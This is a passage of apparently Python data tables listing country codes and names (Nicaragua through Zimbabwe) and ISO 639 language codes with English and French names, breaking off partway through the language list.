('NI', 'NIC', '558', u'Nicaragua'),
('NE', 'NER', '562', u'Niger'),
('NG', 'NGA', '566', u'Nigeria'),
('NU', 'NIU', '570', u'Niue'),
('NF', 'NFK', '574', u'Norfolk Island'),
('MP', 'MNP', '580', u'Northern Mariana Islands'),
('NO', 'NOR', '578', u'Norway'),
('OM', 'OMN', '512', u'Oman'),
('PK', 'PAK', '586', u'Pakistan'),
('PW', 'PLW', '585', u'Palau'),
('PS', 'PSE', '275', u'Palestinian Territory, Occupied'),
('PA', 'PAN', '591', u'Panama'),
('PG', 'PNG', '598', u'Papua New Guinea'),
('PY', 'PRY', '600', u'Paraguay'),
('PE', 'PER', '604', u'Peru'),
('PH', 'PHL', '608', u'Philippines'),
('PN', 'PCN', '612', u'Pitcairn'),
('PL', 'POL', '616', u'Poland'),
('PT', 'PRT', '620', u'Portugal'),
('PR', 'PRI', '630', u'Puerto Rico'),
('QA', 'QAT', '634', u'Qatar'),
('RE', 'REU', '638', u'Réunion'),
('RO', 'ROU', '642', u'Romania'),
('RU', 'RUS', '643', u'Russian Federation'),
('RW', 'RWA', '646', u'Rwanda'),
('BL', 'BLM', '652', u'Saint Barthélemy'),
('SH', 'SHN', '654', u'Saint Helena, Ascension and Tristan da Cunha'),
('KN', 'KNA', '659', u'Saint Kitts and Nevis'),
('LC', 'LCA', '662', u'Saint Lucia'),
('MF', 'MAF', '663', u'Saint Martin (French part)'),
('PM', 'SPM', '666', u'Saint Pierre and Miquelon'),
('VC', 'VCT', '670', u'Saint Vincent and the Grenadines'),
('WS', 'WSM', '882', u'Samoa'),
('SM', 'SMR', '674', u'San Marino'),
('ST', 'STP', '678', u'Sao Tome and Principe'),
('SA', 'SAU', '682', u'Saudi Arabia'),
('SN', 'SEN', '686', u'Senegal'),
('RS', 'SRB', '688', u'Serbia'),
('SC', 'SYC', '690', u'Seychelles'),
('SL', 'SLE', '694', u'Sierra Leone'),
('SG', 'SGP', '702', u'Singapore'),
('SX', 'SXM', '534', u'Sint Maarten (Dutch part)'),
('SK', 'SVK', '703', u'Slovakia'),
('SI', 'SVN', '705', u'Slovenia'),
('SB', 'SLB', '090', u'Solomon Islands'),
('SO', 'SOM', '706', u'Somalia'),
('ZA', 'ZAF', '710', u'South Africa'),
('GS', 'SGS', '239', u'South Georgia and the South Sandwich Islands'),
('ES', 'ESP', '724', u'Spain'),
('LK', 'LKA', '144', u'Sri Lanka'),
('SD', 'SDN', '729', u'Sudan'),
('SR', 'SUR', '740', u'Suriname'),
('SS', 'SSD', '728', u'South Sudan'),
('SJ', 'SJM', '744', u'Svalbard and Jan Mayen'),
('SZ', 'SWZ', '748', u'Swaziland'),
('SE', 'SWE', '752', u'Sweden'),
('CH', 'CHE', '756', u'Switzerland'),
('SY', 'SYR', '760', u'Syrian Arab Republic'),
('TW', 'TWN', '158', u'Taiwan, Province of China'),
('TJ', 'TJK', '762', u'Tajikistan'),
('TZ', 'TZA', '834', u'Tanzania, United Republic of'),
('TH', 'THA', '764', u'Thailand'),
('TL', 'TLS', '626', u'Timor-Leste'),
('TG', 'TGO', '768', u'Togo'),
('TK', 'TKL', '772', u'Tokelau'),
('TO', 'TON', '776', u'Tonga'),
('TT', 'TTO', '780', u'Trinidad and Tobago'),
('TN', 'TUN', '788', u'Tunisia'),
('TR', 'TUR', '792', u'Turkey'),
('TM', 'TKM', '795', u'Turkmenistan'),
('TC', 'TCA', '796', u'Turks and Caicos Islands'),
('TV', 'TUV', '798', u'Tuvalu'),
('UG', 'UGA', '800', u'Uganda'),
('UA', 'UKR', '804', u'Ukraine'),
('AE', 'ARE', '784', u'United Arab Emirates'),
('GB', 'GBR', '826', u'United Kingdom'),
('US', 'USA', '840', u'United States'),
('UM', 'UMI', '581', u'United States Minor Outlying Islands'),
('UY', 'URY', '858', u'Uruguay'),
('UZ', 'UZB', '860', u'Uzbekistan'),
('VU', 'VUT', '548', u'Vanuatu'),
('VE', 'VEN', '862', u'Venezuela, Bolivarian Republic of'),
('VN', 'VNM', '704', u'Viet Nam'),
('VG', 'VGB', '092', u'Virgin Islands, British'),
('VI', 'VIR', '850', u'Virgin Islands, U.S.'),
('WF', 'WLF', '876', u'Wallis and Futuna'),
('EH', 'ESH', '732', u'Western Sahara'),
('YE', 'YEM', '887', u'Yemen'),
('ZM', 'ZMB', '894', u'Zambia'),
('ZW', 'ZWE', '716', u'Zimbabwe')]
LANGUAGES = [('aar', '', 'aa', u'Afar', u'afar'),
('abk', '', 'ab', u'Abkhazian', u'abkhaze'),
('ace', '', '', u'Achinese', u'aceh'),
('ach', '', '', u'Acoli', u'acoli'),
('ada', '', '', u'Adangme', u'adangme'),
('ady', '', '', u'Adyghe; Adygei', u'adyghé'),
('afa', '', '', u'Afro-Asiatic languages', u'afro-asiatiques, langues'),
('afh', '', '', u'Afrihili', u'afrihili'),
('afr', '', 'af', u'Afrikaans', u'afrikaans'),
('ain', '', '', u'Ainu', u'aïnou'),
('aka', '', 'ak', u'Akan', u'akan'),
('akk', '', '', u'Akkadian', u'akkadien'),
('alb', 'sqi', 'sq', u'Albanian', u'albanais'),
('ale', '', '', u'Aleut', u'aléoute'),
('alg', '', '', u'Algonquian languages', u'algonquines, langues'),
('alt', '', '', u'Southern Altai', u'altai du Sud'),
('amh', '', 'am', u'Amharic', u'amharique'),
('ang', '', '', u'English, Old (ca.450-1100)', u'anglo-saxon (ca.450-1100)'),
('anp', '', '', u'Angika', u'angika'),
('apa', '', '', u'Apache languages', u'apaches, langues'),
('ara', '', 'ar', u'Arabic', u'arabe'),
('arc', '', '', u'Official Aramaic (700-300 BCE); Imperial Aramaic (700-300 BCE)', u'araméen d\'empire (700-300 BCE)'),
('arg', '', 'an', u'Aragonese', u'aragonais'),
('arm', 'hye', 'hy', u'Armenian', u'arménien'),
('arn', '', '', u'Mapudungun; Mapuche', u'mapudungun; mapuche; mapuce'),
('arp', '', '', u'Arapaho', u'arapaho'),
('art', '', '', u'Artificial languages', u'artificielles, langues'),
('arw', '', '', u'Arawak', u'arawak'),
('asm', '', 'as', u'Assamese', u'assamais'),
('ast', '', '', u'Asturian; Bable; Leonese; Asturleonese', u'asturien; bable; léonais; asturoléonais'),
('ath', '', '', u'Athapascan languages', u'athapascanes, langues'),
('aus', '', '', u'Australian languages', u'australiennes, langues'),
('ava', '', 'av', u'Avaric', u'avar'),
('ave', '', 'ae', u'Avestan', u'avestique'),
('awa', '', '', u'Awadhi', u'awadhi'),
('aym', '', 'ay', u'Aymara', u'aymara'),
('aze', '', 'az', u'Azerbaijani', u'azéri'),
('bad', '', '', u'Banda languages', u'banda, langues'),
('bai', '', '', u'Bamileke languages', u'bamiléké, langues'),
('bak', '', 'ba', u'Bashkir', u'bachkir'),
('bal', '', '', u'Baluchi', u'baloutchi'),
('bam', '', 'bm', u'Bambara', u'bambara'),
('ban', '', '', u'Balinese', u'balinais'),
('baq', 'eus', 'eu', u'Basque', u'basque'),
('bas', '', '', u'Basa', u'basa'),
('bat', '', '', u'Baltic languages', u'baltes, langues'),
('bej', '', '', u'Beja; Bedawiyet', u'bedja'),
('bel', '', 'be', u'Belarusian', u'biélorusse'),
('bem', '', '', u'Bemba', u'bemba'),
('ben', '', 'bn', u'Bengali', u'bengali'),
('ber', '', '', u'Berber languages', u'berbères, langues'),
('bho', '', '', u'Bhojpuri', u'bhojpuri'),
('bih', '', 'bh', u'Bihari languages', u'langues biharis'),
('bik', '', '', u'Bikol', u'bikol'),
('bin', '', '', u'Bini; Edo', u'bini; edo'),
('bis', '', 'bi', u'Bislama', u'bichlamar'),
('bla', '', '', u'Siksika', u'blackfoot'),
('bnt', '', '', u'Bantu (Other)', u'bantoues, autres langues'),
('bos', '', 'bs', u'Bosnian', u'bosniaque'),
('bra', '', '', u'Braj', u'braj'),
('bre', '', 'br', u'Breton', u'breton'),
('btk', '', '', u'Batak languages', u'batak, langues'),
('bua', '', '', u'Buriat', u'bouriate'),
('bug', '', '', u'Buginese', u'bugi'),
('bul', '', 'bg', u'Bulgarian', u'bulgare'),
('bur', 'mya', 'my', u'Burmese', u'birman'),
('byn', '', '', u'Blin; Bilin', u'blin; bilen'),
('cad', '', '', u'Caddo', u'caddo'),
('cai', '', '', u'Central American Indian languages', u'amérindiennes de L\'Amérique centrale, langues'),
('car', '', '', u'Galibi Carib', u'karib; galibi; carib'),
('cat', '', 'ca', u'Catalan; Valencian', u'catalan; valencien'),
('cau', '', '', u'Caucasian languages', u'caucasiennes, langues'),
('ceb', '', '', u'Cebuano', u'cebuano'),
('cel', '', '', u'Celtic languages', u'celtiques, langues; celtes, langues'),
('cha', '', 'ch', u'Chamorro', u'chamorro'),
('chb', '', '', u'Chibcha', u'chibcha'),
('che', '', 'ce', u'Chechen', u'tchétchène'),
('chg', '', '', u'Chagatai', u'djaghataï'),
('chi', 'zho', 'zh', u'Chinese', u'chinois'),
('chk', '', '', u'Chuukese', u'chuuk'),
('chm', '', '', u'Mari', u'mari'),
('chn', '', '', u'Chinook jargon', u'chinook, jargon'),
('cho', '', '', u'Choctaw', u'choctaw'),
('chp', '', '', u'Chipewyan; Dene Suline', u'chipewyan'),
('chr', '', '', u'Cherokee', u'cherokee'),
('chu', '', 'cu', u'Church Slavic; Old Slavonic; Church Slavonic; Old Bulgarian; Old Church Slavonic', u'slavon d\'église; vieux slave; slavon liturgique; vieux bulgare'),
('chv', '', 'cv', u'Chuvash', u'tchouvache'),
('chy', '', '', u'Cheyenne', u'cheyenne'),
('cmc', '', '', u'Chamic languages', u'chames, langues'),
('cop', '', '', u'Coptic', u'copte'),
('cor', '', 'kw', u'Cornish', u'cornique'),
('cos', '', 'co', u'Corsican', u'corse'),
('cpe', '', '', u'Creoles and pidgins, English based', u'créoles et pidgins basés sur l\'anglais'),
('cpf', '', '', u'Creoles and pidgins, French-based ', u'créoles et pidgins basés sur le français'),
('cpp', '', '', u'Creoles and pidgins, Portuguese-based ', u'créoles et pidgins basés sur le portugais'),
('cre', '', 'cr', u'Cree', u'cree'),
('crh', '', '', u'Crimean Tatar; Crimean Turkish', u'tatar de Crimé'),
('crp', '', '', u'Creoles and pidgins ', u'créoles et pidgins'),
('csb', '', '', u'Kashubian', u'kachoube'),
('cus', '', '', u'Cushitic languages', u'couchitiques, langues'),
('cze', 'ces', 'cs', u'Czech', u'tchèque'),
('dak', '', '', u'Dakota', u'dakota'),
('dan', '', 'da', u'Danish', u'danois'),
('dar', '', '', u'Dargwa', u'dargwa'),
('day', '', '', u'Land Dayak languages', u'dayak, langues'),
('del', '', '', u'Delaware', u'delaware'),
('den', '', '', u'Slave (Athapascan)', u'esclave (athapascan)'),
('dgr', '', '', u'Dogrib', u'dogrib'),
('din', '', '', u'Dinka', u'dinka'),
('div', '', 'dv', u'Divehi; Dhivehi; Maldivian', u'maldivien'),
('doi', '', '', u'Dogri', u'dogri'),
('dra', '', '', u'Dravidian languages', u'dravidiennes, langues'),
('dsb', '', '', u'Lower Sorbian', u'bas-sorabe'),
('dua', '', '', u'Duala', u'douala'),
('dum', '', '', u'Dutch, Middle (ca.1050-1350)', u'néerlandais moyen (ca. 1050-1350)'),
('dut', 'nld', 'nl', u'Dutch; Flemish', u'néerlandais; flamand'),
('dyu', '', '', u'Dyula', u'dioula'),
('dzo', '', 'dz', u'Dzongkha', u'dzongkha'),
('efi', '', '', u'Efik', u'efik'),
('egy', '', '', u'Egyptian (Ancient)', u'égyptien'),
('eka', '', '', u'Ekajuk', u'ekajuk'),
('elx', '', '', u'Elamite', u'élamite'),
('eng', '', 'en', u'English', u'anglais'),
('enm', '', '', u'English, Middle (1100-1500)', u'anglais moyen (1100-1500)'),
('epo', '', 'eo', u'Esperanto', u'espéranto'),
('est', '', 'et', u'Estonian', u'estonien'),
('ewe', '', 'ee', u'Ewe', u'éwé'),
('ewo', '', '', u'Ewondo', u'éwondo'),
('fan', '', '', u'Fang', u'fang'),
('fao', '', 'fo', u'Faroese', u'féroïen'),
('fat', '', '', u'Fanti', u'fanti'),
('fij', '', 'fj', u'Fijian', u'fidjien'),
('fil', '', '', u'Filipino; Pilipino', u'filipino; pilipino'),
('fin', '', 'fi', u'Finnish', u'finnois'),
('fiu', '', '', u'Finno-Ugrian languages', u'finno-ougriennes, langues'),
('fon', '', '', u'Fon', u'fon'),
('fre', 'fra', 'fr', u'French', u'français'),
('frm', '', '', u'French, Middle (ca.1400-1600)', u'français moyen (1400-1600)'),
('fro', '', '', u'French, Old (842-ca.1400)', u'français ancien (842-ca.1400)'),
('frr', '', '', u'Northern Frisian', u'frison septentrional'),
('frs', '', '', u'Eastern Frisian', u'frison oriental'),
('fry', '', 'fy', u'Western Frisian', u'frison occidental'),
('ful', '', 'ff', u'Fulah', u'peul'),
('fur', '', '', u'Friulian', u'frioulan'),
('gaa', '', '', u'Ga', u'ga'),
('gay', '', '', u'Gayo', u'gayo'),
('gba', '', '', u'Gbaya', u'gbaya'),
('gem', '', '', u'Germanic languages', u'germaniques, langues'),
('geo', 'kat', 'ka', u'Georgian', u'géorgien'),
('ger', 'deu', 'de', u'German', u'allemand'),
('gez', '', '', u'Geez', u'guèze'),
('gil', '', '', u'Gilbertese', u'kiribati'),
('gla', '', 'gd', u'Gaelic; Scottish Gaelic', u'gaélique; gaélique écossais'),
('gle', '', 'ga', u'Irish', u'irlandais'),
('glg', '', 'gl', u'Galician', u'galicien'),
('glv', '', 'gv', u'Manx', u'manx; mannois'),
('gmh', '', '', u'German, Middle High (ca.1050-1500)', u'allemand, moyen haut (ca. 1050-1500)'),
('goh', '', '', u'German, Old High (ca.750-1050)', u'allemand, vieux haut (ca. 750-1050)'),
('gon', '', '', u'Gondi', u'gond'),
('gor', '', '', u'Gorontalo', u'gorontalo'),
('got', '', '', u'Gothic', u'gothique'),
('grb', '', '', u'Grebo', u'grebo'),
('grc', '', '', u'Greek, Ancient (to 1453)', u'grec ancien (jusqu\'à 1453)'),
('gre', 'ell', 'el', u'Greek, Modern (1453-)', u'grec moderne (après 1453)'),
('grn', '', 'gn', u'Guarani', u'guarani'),
('gsw', '', '', u'Swiss German; Alemannic; Alsatian', u'suisse alémanique; alémanique; alsacien'),
('guj', '', 'gu', u'Gujarati', u'goudjrati'),
('gwi', '', '', u'Gwich\'in', u'gwich\'in'),
('hai', '', '', u'Haida', u'haida'),
('hat', '', 'ht', u'Haitian; Haitian Creole', u'haïtien; créole haïtien'),
('hau', '', 'ha', u'Hausa', u'haoussa'),
('haw', '', '', u'Hawaiian', u'hawaïen'),
('heb', '', 'he', u'Hebrew', u'hébreu'),
('her', '', 'hz', u'Herero', u'herero'),
('hil', '', '', u'Hiligaynon', u'hiligaynon'),
('him', '', '', u'Himachali languages; Western Pahari languages', u'langues himachalis; langues paharis occidentales'),
('hin', '', 'hi', u'Hindi', u'hindi'),
('hit', '', '', u'Hittite', u'hittite'),
('hmn', '', '', u'Hmong; Mong', u'hmong'),
('hmo', '', 'ho', u'Hiri Motu', u'hiri motu'),
('hrv', '', 'hr', u'Croatian', u'croate'),
('hsb', '', '', u'Upper Sorbian', u'haut-sorabe'),
('hun', '', 'hu', u'Hungarian', u'hongrois'),
('hup', '', '', u'Hupa', u'hupa'),
('iba', '', '', u'Iban', u'iban'),
('ibo', '', 'ig', u'Igbo', u'igbo'),
('ice', 'isl', 'is', u'Icelandic', u'islandais'),
('ido', '', 'io', u'Ido', u'ido'),
('iii', '', 'ii', u'Sichuan Yi; Nuosu', u'yi de Sichuan'),
('ijo', '', '', u'Ijo languages', u'ijo, langues'),
('iku', '', 'iu', u'Inuktitut', u'inuktitut'),
('ile', '', 'ie', u'Interlingue; Occidental', u'interlingue'),
('ilo', '', '', u'Iloko', u'ilocano'),
('ina', '', 'ia', u'Interlingua (International Auxiliary Language Association)', u'interlingua (langue auxiliaire internationale)'),
('inc', '', '', u'Indic languages', u'indo-aryennes, langues'),
('ind', '', 'id', u'Indonesian', u'indonésien'),
('ine', '', '', u'Indo-European languages', u'indo-européennes, langues'),
('inh', '', '', u'Ingush', u'ingouche'),
('ipk', '', 'ik', u'Inupiaq', u'inupiaq'),
('ira', '', '', u'Iranian languages', u'iraniennes, langues'),
('iro', '', '', u'Iroquoian languages', u'iroquoises, langues'),
('ita', '', 'it', u'Italian', u'italien'),
('jav', '', 'jv', u'Javanese', u'javanais'),
('jbo', '', '', u'Lojban', u'lojban'),
('jpn', '', 'ja', u'Japanese', u'japonais'),
('jpr', '', '', u'Judeo-Persian', u'judéo-persan'),
('jrb', '', '', u'Judeo-Arabic', u'judéo-arabe'),
('kaa', '', '', u'Kara-Kalpak', u'karakalpak'),
('kab', '', '', u'Kabyle', u'kabyle'),
('kac', '', '', u'Kachin; Jingpho', u'kachin; jingpho'),
('kal', '', 'kl', u'Kalaallisut; Greenlandic', u'groenlandais'),
('kam', '', '', u'Kamba', u'kamba'),
('kan', '', 'kn', u'Kannada', u'kannada'),
('kar', '', '', u'Karen languages', u'karen, langues'),
('kas', '', 'ks', u'Kashmiri', u'kashmiri'),
('kau', '', 'kr', u'Kanuri', u'kanouri'),
('kaw', '', '', u'Kawi', u'kawi'),
('kaz', '', 'kk', u'Kazakh', u'kazakh'),
('kbd', '', '', u'Kabardian', u'kabardien'),
('kha', '', '', u'Khasi', u'khasi'),
('khi', '', '', u'Khoisan languages', u'khoïsan, langues'),
('khm', '', 'km', u'Central Khmer', u'khmer central'),
('kho', '', '', u'Khotanese; Sakan', u'khotanais; sakan'),
('kik', '', 'ki', u'Kikuyu; Gikuyu', u'kikuyu'),
('kin', '', 'rw', u'Kinyarwanda', u'rwanda'),
('kir', '', 'ky', u'Kirghiz; Kyrgyz', u'kirghiz'),
('kmb', '', '', u'Kimbundu', u'kimbundu'),
('kok', '', '', u'Konkani', u'konkani'),
('kom', '', 'kv', u'Komi', u'kom'),
('kon', '', 'kg', u'Kongo', u'kongo'),
('kor', '', 'ko', u'Korean', u'coréen'),
('kos', '', '', u'Kosraean', u'kosrae'),
('kpe', '', '', u'Kpelle', u'kpellé'),
('krc', '', '', u'Karachay-Balkar', u'karatchai balkar'),
('krl', '', '', u'Karelian', u'carélien'),
('kro', '', '', u'Kru languages', u'krou, langues'),
('kru', '', '', u'Kurukh', u'kurukh'),
('kua', '', 'kj', u'Kuanyama; Kwanyama', u'kuanyama; kwanyama'),
('kum', '', '', u'Kumyk', u'koumyk'),
('kur', '', 'ku', u'Kurdish', u'kurde'),
('kut', '', '', u'Kutenai', u'kutenai'),
('lad', '', '', u'Ladino', u'judéo-espagnol'),
('lah', '', '', u'Lahnda', u'lahnda'),
('lam', '', '', u'Lamba', u'lamba'),
('lao', '', 'lo', u'Lao', u'lao'),
('lat', '', 'la', u'Latin', u'latin'),
('lav', '', 'lv', u'Latvian', u'letton'),
('lez', '', '', u'Lezghian', u'lezghien'),
('lim', '', 'li', u'Limburgan; Limburger; Limburgish', u'limbourgeois'),
('lin', '', 'ln', u'Lingala', u'lingala'),
('lit', '', 'lt', u'Lithuanian', u'lituanien'),
('lol', '', '', u'Mongo', u'mongo'),
('loz', '', '', u'Lozi', u'lozi'),
('ltz', '', 'lb', u'Luxembourgish; Letzeburgesch', u'luxembourgeois'),
('lua', '', '', u'Luba-Lulua', u'luba-lulua'),
('lub', '', 'lu', u'Luba-Katanga', u'luba-katanga'),
('lug', '', 'lg', u'Ganda', u'ganda'),
('lui', '', '', u'Luiseno', u'luiseno'),
('lun', '', '', u'Lunda', u'lunda'),
('luo', '', '', u'Luo (Kenya and Tanzania)', u'luo (Kenya et Tanzanie)'),
('lus', '', '', u'Lushai', u'lushai'),
('mac', 'mkd', 'mk', u'Macedonian', u'macédonien'),
('mad', '', '', u'Madurese', u'madourais'),
('mag', '', '', u'Magahi', u'magahi'),
('mah', '', 'mh', u'Marshallese', u'marshall'),
('mai', '', '', u'Maithili', u'maithili'),
('mak', '', '', u'Makasar', u'makassar'),
('mal', '', 'ml', u'Malayalam', u'malayalam'),
('man', '', '', u'Mandingo', u'mandingue'),
('mao', 'mri', 'mi', u'Maori', u'maori'),
('map', '', '', u'Austronesian languages', u'austronésiennes, langues'),
('mar', '', 'mr', u'Marathi', u'marathe'),
('mas', '', '', u'Masai', u'massaï'),
('may', 'msa', 'ms', u'Malay', u'malais'),
('mdf', '', '', u'Moksha', u'moksa'),
('mdr', '', '', u'Mandar', u'mandar'),
('men', '', '', u'Mende', u'mendé'),
('mga', '', '', u'Irish, Middle (900-1200)', u'irlandais moyen (900-1200)'),
('mic', '', '', u'Mi\'kmaq; Micmac', u'mi\'kmaq; micmac'),
('min', '', '', u'Minangkabau', u'minangkabau'),
('mkh', '', '', u'Mon-Khmer languages', u'môn-khmer, langues'),
('mlg', '', 'mg', u'Malagasy', u'malgache'),
('mlt', '', 'mt', u'Maltese', u'maltais'),
('mnc', '', '', u'Manchu', u'mandchou'),
('mni', '', '', u'Manipuri', u'manipuri'),
('mno', '', '', u'Manobo languages', u'manobo, langues'),
('moh', '', '', u'Mohawk', u'mohawk'),
('mon', '', 'mn', u'Mongolian', u'mongol'),
('mos', '', '', u'Mossi', u'moré'),
('mun', '', '', u'Munda languages', u'mounda, langues'),
('mus', '', '', u'Creek', u'muskogee'),
('mwl', '', '', u'Mirandese', u'mirandais'),
('mwr', '', '', u'Marwari', u'marvari'),
('myn', '', '', u'Mayan languages', u'maya, langues'),
('myv', '', '', u'Erzya', u'erza'),
('nah', '', '', u'Nahuatl languages', u'nahuatl, langues'),
('nai', '', '', u'North American Indian languages', u'nord-amérindiennes, langues'),
('nap', '', '', u'Neapolitan', u'napolitain'),
('nau', '', 'na', u'Nauru', u'nauruan'),
('nav', '', 'nv', u'Navajo; Navaho', u'navaho'),
('nbl', '', 'nr', u'Ndebele, South; South Ndebele', u'ndébélé du Sud'),
('nde', '', 'nd', u'Ndebele, North; North Ndebele', u'ndébélé du Nord'),
('ndo', '', 'ng', u'Ndonga', u'ndonga'),
('nds', '', '', u'Low German; Low Saxon; German, Low; Saxon, Low', u'bas allemand; bas saxon; allemand, bas; saxon, bas'),
('nep', '', 'ne', u'Nepali', u'népalais'),
('new', '', '', u'Nepal Bhasa; Newari', u'nepal bhasa; newari'),
('nia', '', '', u'Nias', u'nias'),
('nic', '', '', u'Niger-Kordofanian languages', u'nigéro-kordofaniennes, langues'),
('niu', '', '', u'Niuean', u'niué'),
('nno', '', 'nn', u'Norwegian Nynorsk; Nynorsk, Norwegian', u'norvégien nynorsk; nynorsk, norvégien'),
('nob', '', 'nb', u'Bokmål, Norwegian; Norwegian Bokmål', u'norvégien bokmål'),
('nog', '', '', u'Nogai', u'nogaï; nogay'),
('non', '', '', u'Norse, Old', u'norrois, vieux'),
('nor', '', 'no', u'Norwegian', u'norvégien'),
('nqo', '', '', u'N\'Ko', u'n\'ko'),
('nso', '', '', u'Pedi; Sepedi; Northern Sotho', u'pedi; sepedi; sotho du Nord'),
('nub', '', '', u'Nubian languages', u'nubiennes, langues'),
('nwc', '', '', u'Classical Newari; Old Newari; Classical Nepal Bhasa', u'newari classique'),
('nya', '', 'ny', u'Chichewa; Chewa; Nyanja', u'chichewa; chewa; nyanja'),
('nym', '', '', u'Nyamwezi', u'nyamwezi'),
('nyn', '', '', u'Nyankole', u'nyankolé'),
('nyo', '', '', u'Nyoro', u'nyoro'),
('nzi', '', '', u'Nzima', u'nzema'),
('oci', '', 'oc', u'Occitan (post 1500); Provençal', u'occitan (après 1500); provençal'),
('oji', '', 'oj', u'Ojibwa', u'ojibwa'),
('ori', '', 'or', u'Oriya', u'oriya'),
('orm', '', 'om', u'Oromo', u'galla'),
('osa', '', '', u'Osage', u'osage'),
('oss', '', 'os', u'Ossetian; Ossetic', u'ossète'),
('ota', '', '', u'Turkish, Ottoman (1500-1928)', u'turc ottoman (1500-1928)'),
('oto', '', '', u'Otomian languages', u'otomi, langues'),
('paa', '', '', u'Papuan languages', u'papoues, langues'),
('pag', '', '', u'Pangasinan', u'pangasinan'),
('pal', '', '', u'Pahlavi', u'pahlavi'),
('pam', '', '', u'Pampanga; Kapampangan', u'pampangan'),
('pan', '', 'pa', u'Panjabi; Punjabi', u'pendjabi'),
('pap', '', '', u'Papiamento', u'papiamento'),
('pau', '', '', u'Palauan', u'palau'),
('peo', '', '', u'Persian, Old (ca.600-400 B.C.)', u'perse, vieux (ca. 600-400 av. J.-C.)'),
('per', 'fas', 'fa', u'Persian', u'persan'),
('phi', '', '', u'Philippine languages', u'philippines, langues'),
('phn', '', '', u'Phoenician', u'phénicien'),
('pli', '', 'pi', u'Pali', u'pali'),
('pol', '', 'pl', u'Polish', u'polonais'),
('pon', '', '', u'Pohnpeian', u'pohnpei'),
('pob', '', 'pb', u'Brazilian Portuguese', u'brazilian portuguese'),
('por', '', 'pt', u'Portuguese', u'portugais'),
('pra', '', '', u'Prakrit languages', u'prâkrit, langues'),
('pro', '', '', u'Provençal, Old (to 1500)', u'provençal ancien (jusqu\'à 1500)'),
('pus', '', 'ps', u'Pushto; Pashto', u'pachto'),
('que', '', 'qu', u'Quechua', u'quechua'),
('raj', '', '', u'Rajasthani', u'rajasthani'),
('rap', '', '', u'Rapanui', u'rapanui'),
('rar', '', '', u'Rarotongan; Cook Islands Maori', u'rarotonga; maori des îles Cook'),
('roa', '', '', u'Romance languages', u'romanes, langues'),
('roh', '', 'rm', u'Romansh', u'romanche'),
('rom', '', '', u'Romany', u'tsigane'),
('rum', 'ron', 'ro', u'Romanian; Moldavian; Moldovan', u'roumain; moldave'),
('run', '', 'rn', u'Rundi', u'rundi'),
('rup', '', '', u'Aromanian; Arumanian; Macedo-Romanian', u'aroumain; macédo-roumain'),
('rus', '', 'ru', u'Russian', u'russe'),
('sad', '', '', u'Sandawe', u'sandawe'),
('sag', '', 'sg', u'Sango', u'sango'),
('sah', '', '', u'Yakut', u'iakoute'),
('sai', '', '', u'South American Indian (Other)', u'indiennes d\'Amérique du Sud, autres langues'),
('sal', '', '', u'Salishan languages', u'salishennes, langues'),
('sam', '', '', u'Samaritan Aramaic', u'samaritain'),
('san', '', 'sa', u'Sanskrit', u'sanskrit'),
('sas', '', '', u'Sasak', u'sasak'),
('sat', '', '', u'Santali', u'santal'),
('scn', '', '', u'Sicilian', u'sicilien'),
('sco', '', '', u'Scots', u'écossais'),
('sel', '', '', u'Selkup', u'selkoupe'),
('sem', '', '', u'Semitic languages', u'sémitiques, langues'),
('sga', '', '', u'Irish, Old (to 900)', u'irlandais ancien (jusqu\'à 900)'),
('sgn', '', '', u'Sign Languages', u'langues des signes'),
('shn', '', '', u'Shan', u'chan'),
('sid', '', '', u'Sidamo', u'sidamo'),
('sin', '', 'si', u'Sinhala; Sinhalese', u'singhalais'),
('sio', '', '', u'Siouan languages', u'sioux, langues'),
('sit', '', '', u'Sino-Tibetan languages', u'sino-tibétaines, langues'),
('sla', '', '', u'Slavic languages', u'slaves, langues'),
('slo', 'slk', 'sk', u'Slovak', u'slovaque'),
('slv', '', 'sl', u'Slovenian', u'slovène'),
('sma', '', '', u'Southern Sami', u'sami du Sud'),
('sme', '', 'se', u'Northern Sami', u'sami du Nord'),
('smi', '', '', u'Sami languages', u'sames, langues'),
('smj', '', '', u'Lule Sami', u'sami de Lule'),
('smn', '', '', u'Inari Sami', u'sami d\'Inari'),
('smo', '', 'sm', u'Samoan', u'samoan'),
('sms', '', '', u'Skolt Sami', u'sami skolt'),
('sna', '', 'sn', u'Shona', u'shona'),
('snd', '', 'sd', u'Sindhi', u'sindhi'),
('snk', '', '', u'Soninke', u'soninké'),
('sog', '', '', u'Sogdian', u'sogdien'),
('som', '', 'so', u'Somali', u'somali'),
('son', '', '', u'Songhai languages', u'songhai, langues'),
('sot', '', 'st', u'Sotho, Southern', u'sotho du Sud'),
('spa', '', 'es', u'Spanish; Castilian', u'espagnol; castillan'),
('srd', '', 'sc', u'Sardinian', u'sarde'),
('srn', '', '', u'Sranan Tongo', u'sranan tongo'),
('srp', '', 'sr', u'Serbian', u'serbe'),
('srr', '', '', u'Serer', u'sérère'),
('ssa', '', '', u'Nilo-Saharan languages', u'nilo-sahariennes, langues'),
('ssw', '', 'ss', u'Swati', u'swati'),
('suk', '', '', u'Sukuma', u'sukuma'),
('sun', '', 'su', u'Sundanese', u'soundanais'),
('sus', '', '', u'Susu', u'soussou'),
('sux', '', '', u'Sumerian', u'sumérien'),
('swa', '', 'sw', u'Swahili', u'swahili'),
('swe', '', 'sv', u'Swedish', u'suédois'),
('syc', '', '', u'Classical Syriac', u'syriaque classique'),
('syr', '', '', u'Syriac', u'syriaque'),
('tah', '', 'ty', u'Tahitian', u'tahitien'),
('tai', '', '', u'Tai languages', u'tai, langues'),
('tam', '', 'ta', u'Tamil', u'tamoul'),
('tat', '', 'tt', u'Tatar', u'tatar'),
('tel', '', 'te', u'Telugu', u'télougou'),
('tem', '', '', u'Timne', u'temne'),
('ter', '', '', u'Tereno', u'tereno'),
('tet', '', '', u'Tetum', u'tetum'),
('tgk', '', 'tg', u'Tajik', u'tadjik'),
('tgl', '', 'tl', u'Tagalog', u'tagalog'),
('tha', '', 'th', u'Thai', u'thaï'),
('tib', 'bod', 'bo', u'Tibetan', u'tibétain'),
('tig', '', '', u'Tigre', u'tigré'),
('tir', '', 'ti', u'Tigrinya', u'tigrigna'),
('tiv', '', '', u'Tiv', u'tiv'),
('tkl', '', '', u'Tokelau', u'tokelau'),
('tlh', '', '', u'Klingon; tlhIngan-Hol', u'klingon'),
('tli', '', '', u'Tlingit', u'tlingit'),
('tmh', '', '', u'Tamashek', u'tamacheq'),
('tog', '', '', u'Tonga (Nyasa)', u'tonga (Nyasa)'),
('ton', '', 'to', u'Tonga (Tonga Islands)', u'tongan (Îles Tonga)'),
('tpi', '', '', u'Tok Pisin', u'tok pisin'),
('tsi', '', '', u'Tsimshian', u'tsimshian'),
